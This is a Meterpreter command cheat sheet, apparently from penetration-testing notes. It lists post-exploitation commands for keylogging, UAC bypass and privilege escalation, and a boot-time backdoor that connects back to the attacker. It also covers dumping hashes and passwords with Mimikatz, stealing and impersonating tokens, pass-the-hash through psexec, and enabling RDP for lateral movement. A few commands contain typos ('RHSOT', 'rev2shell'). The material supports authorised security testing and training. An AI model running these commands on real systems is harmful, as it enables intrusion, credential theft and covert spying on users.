Meterpreter Commands

1. Basics

help --> List available commands

sysinfo --> Displays system info

getuid --> List current session owner

sessions -i 2 --> Change to session 2

shell --> Drop to interactive shell

channel -i 1 --> Change to shell in channel 1

background --> Background session to interact with msfconsole

upload {local path} {victim path} --> Upload a file

download {path} --> Download file

reg {Command} --> Interacts with registry (reg by itself will list syntax)

execute -f cmd.exe -i --> Execute cmd.exe and interact

execute -f cmd.exe -i -H -t --> Execute cmd as hidden process and with all tokens

- Powershell

load powershell

powershell_execute --> Execute a PowerShell statement, including complex-statements separated by semicolons

powershell_import --> Import a local PowerShell script to execute on the remote system over the Meterpreter channel

powershell_shell --> Launch an interactive PowerShell shell

powershell_session_remove --> Used to remove a PowerShell session when created using execute/import/shell with the -s argument

2. Host Reconnaissance

- List running processes on a system

ps --> List processes

getpid --> List current PID

migrate {PID} --> Migrate to anothe PID

post/windows/manage/migrate --> Make meterpreter migrate to another process.

run service_manager -l --> Lists running services on Windows.

If we are against a non-interactive logon in which the explorer.exe process does not exist, we can create a hidden instance of notepad and migrate into it:

execute -H -f notepad

migrate {PID}

- Screenshots

screengrab --> Run plugin to capture screenshot of user session

- Keylogger

keyscan_start --> Start keylogger

keyscan_stop --> Stop keylogger

keyscan_dump --> Dump keylogger

3. Privilege Escalation

getsystem --> Attempts to elevate privileges.

post/windows/gather/win_privs --> Determine privilege information.

exploit/windows/local/bypassuac_vbs --> Attempts to bypass UAC in order to escalate privileges.

windows/local/bypassuac_fodhelper --> Attempts to bypass UAC with fodhelper method, this should work w/ defender diasbled.

4. Persistence

The exploitation process works this way:

  1. Upload the backdoor on the victim

  2. Execute the file

At prefixed times (i.e. 5-6-10 seconds), it will try to connect back to our listener

  1. Run it automatically at boot

Depending on the OS, this can be done by editing the Windows registry, services, schedules, rc.local, init.d

Thanks to Metasploit, the entire process can be completely automated.

meterpreter > run persistence -h

-A starts the handler on our machine - X start the agent at boot --i 5 connection attempt each 5 seconds -p 8080 the port for the connect back --r [IP_Address] our IP address

Then we can check it:

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v nZvDeQvFvEi

meterpreter > ls C:\\Windows\\TEMP\\fl*

Once the process is complete, if we want to get a session on the target machine, we have to start the listener and wait for incoming connections. We can do it by using the exploit/multi/handler module.

Notice that we have to set the same options set with persistence: same payload, IP address, and local port.

5. Mimikatz

hashdump --> Dumps local hashes

load mimikatz --> Loads Mimikatz extension into Meterpreter session.

wdigest --> Use Mimikatz to retrieve passwords.

6. User Impersonation

To impersonate any logged in users and obtain code execution in their context without access to any passwords or hashes:

load incognito

help incognito

list_tokens -u

impersonate_token corp1\\admin


- Token Impersonation

For pass the ticket attacks or if we elevate or land on a system where a user is running a process, to impersonate it's token:

steal_token {pid}

rev2shell --> Revert to original user

- Pass the Hash

msf exploit(psexec) > set SMBPASS {hash}

msf exploit(psexec) > set SMBUSER {victim username}

SMBUSER => {victim username}

msf exploit(psexec) > set RHSOT {victim PI}

RHOST => {victim IP}

msf exploit(psexec) > exploit

7. Lateral Movement


run getgui -e --> Enable the RDP process on target.

rdesktop target -u user -p password --> Initiate an RDP session with target.

Last updated